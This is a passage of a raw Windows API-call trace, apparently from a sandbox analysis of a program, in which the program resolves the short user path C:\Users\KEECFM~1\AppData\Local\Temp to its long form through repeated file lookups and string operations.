lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28efb4, dwReserved1=0x32, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0xe3c760 [0071.683] FileTimeToLocalFileTime (in: lpFileTime=0x28ef74, lpLocalFileTime=0x28eef0 | out: lpLocalFileTime=0x28eef0) returned 1 [0071.683] FileTimeToDosDateTime (in: lpFileTime=0x28eef0, lpFatDate=0x28ef42, lpFatTime=0x28ef40 | out: lpFatDate=0x28ef42, lpFatTime=0x28ef40) returned 1 [0071.683] FindClose (in: hFindFile=0xe3c760 | out: hFindFile=0xe3c760) returned 1 [0071.683] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\KEECFM~1", psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f474*="C:\\Users\\kEecfMwgj") returned 1 [0071.683] SysReAllocStringLen (in: pbstr=0x28f1e4*=0x0, psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f1e4*="C:\\Users\\kEecfMwgj") returned 1 [0071.683] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\kEecfMwgj", psz="C:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28f474*="C:\\Users\\kEecfMwgj\\") returned 1 [0071.683] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x77a93ca3, cFileName="AppData", cAlternateFileName="")) returned 0xe3c760 [0071.683] FileTimeToLocalFileTime (in: lpFileTime=0x28f22c, lpLocalFileTime=0x28f1a8 | out: lpLocalFileTime=0x28f1a8) returned 1 [0071.683] FileTimeToDosDateTime (in: lpFileTime=0x28f1a8, lpFatDate=0x28f1fa, lpFatTime=0x28f1f8 | out: lpFatDate=0x28f1fa, lpFatTime=0x28f1f8) returned 1 [0071.684] FindClose (in: hFindFile=0xe3c760 | out: hFindFile=0xe3c760) returned 1 [0071.684] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0071.684] SysReAllocStringLen (in: pbstr=0x28f49c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f49c*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0071.684] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0071.684] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f524, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0xe3c7b8 [0071.684] FileTimeToLocalFileTime (in: lpFileTime=0x28f4e4, lpLocalFileTime=0x28f460 | out: lpLocalFileTime=0x28f460) returned 1 [0071.684] FileTimeToDosDateTime (in: lpFileTime=0x28f460, lpFatDate=0x28f4b2, lpFatTime=0x28f4b0 | out: lpFatDate=0x28f4b2, lpFatTime=0x28f4b0) returned 1 [0071.684] FindClose (in: hFindFile=0xe3c7b8 | out: hFindFile=0xe3c7b8) returned 1 [0071.685] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0071.685] SysReAllocStringLen (in: pbstr=0x28f754*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28f754*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0071.685] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0071.685] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe54b47c0, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xe54b47c0, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f7dc, dwReserved1=0x4a, cFileName="Temp", cAlternateFileName="")) returned 0xe3c7b8 [0071.685] FileTimeToLocalFileTime (in: lpFileTime=0x28f79c, lpLocalFileTime=0x28f718 | out: lpLocalFileTime=0x28f718) returned 1 [0071.685] FileTimeToDosDateTime (in: lpFileTime=0x28f718, lpFatDate=0x28f76a, lpFatTime=0x28f768 | out: lpFatDate=0x28f76a, lpFatTime=0x28f768) returned 1 [0071.685] FindClose (in: hFindFile=0xe3c7b8 | out: hFindFile=0xe3c7b8) returned 1 [0071.686] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0071.686] SysReAllocStringLen (in: pbstr=0x28fa0c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fa0c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0071.686] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0071.686] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x28fa60, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0xe3c0a4, ftLastWriteTime.dwHighDateTime=0x28fa78, nFileSizeHigh=0x775d4628, nFileSizeLow=0xe3c0a4, dwReserved0=0x28fa94, dwReserved1=0x4a, cFileName="뽜Tﳘ(P", cAlternateFileName="쁌ã삤ãJ")) returned 0xffffffff [0071.686] GetLastError () returned 0x2 [0071.686] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0071.686] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 0x2010 [0071.687] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x28f7dc, lpFilePart=0x28f7d8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpFilePart=0x28f7d8*="Temp") returned 0x24 [0071.687] SysReAllocStringLen (in: pbstr=0x28fa1c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28fa1c*="C:") returned 1 [0071.687] SysReAllocStringLen (in: pbstr=0x28f9d8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f9d8*="C:\\") returned 1 [0071.687] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.687] SysReAllocStringLen (in: pbstr=0x28f9d4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f9d4*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0071.687] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\") returned 0x20 [0071.687] SetLastError (dwErrCode=0x0) [0071.687] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0071.687] GetLastError () returned 0x0 [0071.687] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0071.687] GetLastError () returned 0x2 [0071.687] SysReAllocStringLen (in: pbstr=0x28fa14*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28fa14*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0071.688] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local", len=0x1f | out: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local") returned 1 [0071.688] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x28f524, lpFilePart=0x28f520 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local", lpFilePart=0x28f520*="Local") returned 0x1f [0071.688] SysReAllocStringLen (in: pbstr=0x28f764*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f764*="C:") returned 1 [0071.688] SysReAllocStringLen (in: pbstr=0x28f720*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f720*="C:\\") returned 1 [0071.688] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.688] SysReAllocStringLen (in: pbstr=0x28f71c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f71c*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0071.688] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\keecfm~1\\appdata\\") returned 0x1a [0071.688] SetLastError (dwErrCode=0x0) [0071.688] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0071.688] GetLastError () returned 0x0 [0071.688] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x28f7a0, ftCreationTime.dwLowDateTime=0x775d43cd, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x15, ftLastAccessTime.dwHighDateTime=0x48, ftLastWriteTime.dwLowDateTime=0xe3c8ac, ftLastWriteTime.dwHighDateTime=0x28f7c0, nFileSizeHigh=0x775d4628, nFileSizeLow=0xe3c8ac, dwReserved0=0x28f7dc, dwReserved1=0x48, cFileName="쥼ãﳈ(P", cAlternateFileName="줔ã쌌ã>")) returned 0xffffffff [0071.689] GetLastError () returned 0x2 [0071.689] SysReAllocStringLen (in: pbstr=0x28f75c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f75c*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0071.689] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\", psz="C:\\Users\\KEECFM~1\\AppData", len=0x19 | out: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData") returned 1 [0071.689] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData", nBufferLength=0x104, lpBuffer=0x28f26c, lpFilePart=0x28f268 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData", lpFilePart=0x28f268*="AppData") returned 0x19 [0071.689] SysReAllocStringLen (in: pbstr=0x28f4ac*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f4ac*="C:") returned 1 [0071.689] SysReAllocStringLen (in: pbstr=0x28f468*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f468*="C:\\") returned 1 [0071.689] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.689] SysReAllocStringLen (in: pbstr=0x28f464*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f464*="C:\\Users\\KEECFM~1\\") returned 1 [0071.689] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\", cchLength=0x12 | out: lpsz="c:\\users\\keecfm~1\\") returned 0x12 [0071.689] SetLastError (dwErrCode=0x0) [0071.689] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0071.689] GetLastError () returned 0x0 [0071.689] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x28f65c, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1d10f36, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0xe20000, nFileSizeHigh=0x40, nFileSizeLow=0xe36b40, dwReserved0=0x28f524, dwReserved1=0x3e, cFileName="줔ã塚(P", cAlternateFileName="殔ã樬ã2")) returned 0xffffffff [0071.689] GetLastError () returned 0x2 [0071.689] SysReAllocStringLen (in: pbstr=0x28f4a4*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f4a4*="C:\\Users\\KEECFM~1\\") returned 1 [0071.690] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\", psz="C:\\Users\\KEECFM~1", len=0x11 | out: pbstr=0x28f72c*="C:\\Users\\KEECFM~1") returned 1 [0071.690] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1", nBufferLength=0x104, lpBuffer=0x28efb4, lpFilePart=0x28efb0 | out: lpBuffer="C:\\Users\\KEECFM~1", lpFilePart=0x28efb0*="KEECFM~1") returned 0x11 [0071.690] SysReAllocStringLen (in: pbstr=0x28f1f4*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f1f4*="C:") returned 1 [0071.690] SysReAllocStringLen (in: pbstr=0x28f1b0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f1b0*="C:\\") returned 1 [0071.690] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.690] SysReAllocStringLen (in: pbstr=0x28f1ac*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1ac*="C:\\Users\\") returned 1 [0071.690] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0071.690] SetLastError (dwErrCode=0x0) [0071.690] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0071.690] GetLastError () returned 0x0 [0071.690] FindFirstFileW (in: lpFileName="C:\\Users\\" (normalized: "c:\\users"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x28f3a4, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1d10f36, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0xe20000, nFileSizeHigh=0x40, nFileSizeLow=0xe369d8, dwReserved0=0x28f26c, dwReserved1=0x32, cFileName="殔ã(@", cAlternateFileName="둬ã도ã\"")) returned 0xffffffff [0071.690] GetLastError () returned 0x2 [0071.690] SysReAllocStringLen (in: pbstr=0x28f1ec*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1ec*="C:\\Users\\") returned 1 [0071.691] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x28f474*="C:\\Users") returned 1 [0071.691] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x28ecfc, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users", lpFilePart=0x28ecf8*="Users") returned 0x8 [0071.691] SysReAllocStringLen (in: pbstr=0x28ef3c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ef3c*="C:") returned 1 [0071.691] SysReAllocStringLen (in: pbstr=0x28eef8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef8*="C:\\") returned 1 [0071.691] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.691] SysReAllocStringLen (in: pbstr=0x28eef4*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef4*="C:\\") returned 1 [0071.691] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.691] SetLastError (dwErrCode=0x0) [0071.691] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0071.691] GetLastError () returned 0x0 [0071.691] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28efb4, dwReserved1=0x22, cFileName="Users", cAlternateFileName="")) returned 0xe3c850 [0071.691] FileTimeToLocalFileTime (in: lpFileTime=0x28ef74, lpLocalFileTime=0x28eef0 | out: lpLocalFileTime=0x28eef0) returned 1 [0071.692] FileTimeToDosDateTime (in: lpFileTime=0x28eef0, lpFatDate=0x28ef42, lpFatTime=0x28ef40 | out: lpFatDate=0x28ef42, lpFatTime=0x28ef40) returned 1 [0071.692] FindClose (in: hFindFile=0xe3c850 | out: hFindFile=0xe3c850) returned 1 [0071.692] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x28f474*="C:\\Users") returned 1 [0071.692] SysReAllocStringLen (in: pbstr=0x28f1e4*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x28f1e4*="C:\\Users") returned 1 [0071.692] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f474*="C:\\Users\\") returned 1 [0071.692] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f26c, dwReserved1=0x32, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0xe3c850 [0071.692] FileTimeToLocalFileTime (in: lpFileTime=0x28f22c, lpLocalFileTime=0x28f1a8 | out: lpLocalFileTime=0x28f1a8) returned 1 [0071.692] FileTimeToDosDateTime (in: lpFileTime=0x28f1a8, lpFatDate=0x28f1fa, lpFatTime=0x28f1f8 | out: lpFatDate=0x28f1fa, lpFatTime=0x28f1f8) returned 1 [0071.692] FindClose (in: hFindFile=0xe3c850 | out: hFindFile=0xe3c850) returned 1 [0071.693] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1", psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj") returned 1 [0071.693] SysReAllocStringLen (in: pbstr=0x28f49c*=0x0, psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f49c*="C:\\Users\\kEecfMwgj") returned 1 [0071.693] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj", psz="C:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\") returned 1 [0071.693] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f524, dwReserved1=0x3e, cFileName="AppData", cAlternateFileName="")) returned 0xe3c850 [0071.693] FileTimeToLocalFileTime (in: lpFileTime=0x28f4e4, lpLocalFileTime=0x28f460 | out: lpLocalFileTime=0x28f460) returned 1 [0071.693] FileTimeToDosDateTime (in: lpFileTime=0x28f460, lpFatDate=0x28f4b2, lpFatTime=0x28f4b0 | out: lpFatDate=0x28f4b2, lpFatTime=0x28f4b0) returned 1 [0071.693] FindClose (in: hFindFile=0xe3c850 | out: hFindFile=0xe3c850) returned 1 [0071.694] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0071.694] SysReAllocStringLen (in: pbstr=0x28f754*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f754*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0071.694] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0071.694] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f7dc, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0xe3c850 [0071.694] FileTimeToLocalFileTime (in: lpFileTime=0x28f79c, lpLocalFileTime=0x28f718 | out: lpLocalFileTime=0x28f718) returned 1 [0071.694] FileTimeToDosDateTime (in: lpFileTime=0x28f718, lpFatDate=0x28f76a, lpFatTime=0x28f768 | out: lpFatDate=0x28f76a, lpFatTime=0x28f768) returned 1 [0071.694] FindClose (in: hFindFile=0xe3c850 | out: hFindFile=0xe3c850) returned 1 [0071.695] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0071.695] SysReAllocStringLen (in: pbstr=0x28fa0c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fa0c*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0071.695] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0071.695] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe54b47c0, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xe54b47c0, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0xe3c850 [0071.695] FileTimeToLocalFileTime (in: lpFileTime=0x28fa54, lpLocalFileTime=0x28f9d0 | out: lpLocalFileTime=0x28f9d0) returned 1 [0071.695] FileTimeToDosDateTime (in: lpFileTime=0x28f9d0, lpFatDate=0x28fa22, lpFatTime=0x28fa20 | out: lpFatDate=0x28fa22, lpFatTime=0x28fa20) returned 1 [0071.695] FindClose (in: hFindFile=0xe3c850 | out: hFindFile=0xe3c850) returned 1 [0071.695] SysReAllocStringLen (in: pbstr=0x28fcdc*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fcdc*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0071.696] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fda0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0071.696] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0071.696] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", cchLength=0x26 | out: 